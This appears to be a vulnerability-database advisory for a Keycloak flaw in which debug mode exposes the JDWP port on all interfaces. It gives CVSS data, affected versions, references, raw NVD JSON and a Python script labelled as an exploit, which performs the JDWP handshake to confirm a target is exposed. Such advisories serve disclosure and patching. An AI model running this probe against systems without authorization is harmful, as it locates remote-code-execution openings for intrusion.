CVE-2025-11538

Description

A vulnerability exists in Keycloak's server distribution where enabling debug mode (--debug <port>) insecurely defaults to binding the Java Debug Wire Protocol (JDWP) port to all network interfaces (0.0.0.0). This exposes the debug port to the local network, allowing an attacker on the same network segment to attach a remote debugger and achieve remote code execution within the Keycloak Java virtual machine.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak < 26.0.0 (with debug mode enabled)

Keycloak < 25.0.6 (with debug mode enabled)

Keycloak < 24.0.10 (with debug mode enabled)

Red Hat Single Sign-On 7.6.x (affected via Keycloak)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import sys

def exploit_keycloak_jdwp(target_host, debug_port):
    """
    CVE-2025-11538 PoC - Keycloak JDWP Remote Code Execution
    This PoC demonstrates the vulnerability by attempting to connect
    to the exposed JDWP port and execute arbitrary code.
    """
    try:
        # Step 1: Handshake with JDWP
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_host, int(debug_port)))
        
        handshake = b'JDWP-Handshake'
        sock.send(handshake)
        response = sock.recv(14)
        
        if response != handshake:
            print(f'[-] JDWP handshake failed')
            return False
        
        print(f'[+] JDWP handshake successful - Target is vulnerable!')
        print(f'[+] Debug port {debug_port} is exposed on {target_host}')
        print(f'[*] Attacker can now attach debugger and execute code')
        
        # Note: Full RCE requires JDWP protocol commands
        # This PoC confirms the exposure only
        sock.close()
        return True
        
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f'Usage: {sys.argv[0]} <target_host> <debug_port>')
        sys.exit(1)
    exploit_keycloak_jdwp(sys.argv[1], sys.argv[2])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11538
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11538
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11538/
[4] VulDB https://vuldb.com/cve/CVE-2025-11538
[5] https://access.redhat.com/errata/RHSA-2025:21370
[6] https://access.redhat.com/errata/RHSA-2025:21371
[7] https://access.redhat.com/security/cve/CVE-2025-11538
[8] https://bugzilla.redhat.com/show_bug.cgi?id=2402622
[9] https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9
[10] https://github.com/keycloak/keycloak/pull/43574

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11538", "sourceIdentifier": "[email protected]", "published": "2025-11-13T17:15:44.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in Keycloak's server distribution where enabling debug mode (--debug <port>) insecurely defaults to binding the Java Debug Wire Protocol (JDWP) port to all network interfaces (0.0.0.0). This exposes the debug port to the local network, allowing an attacker on the same network segment to attach a remote debugger and achieve remote code execution within the Keycloak Java virtual machine."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1327"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:21370", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21371", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-11538", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402622", "source": "[email protected]"}, {"url": "https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9", "source": "[email protected]"}, {"url": "https://github.com/keycloak/keycloak/pull/43574", "source": "[email protected]"}]}}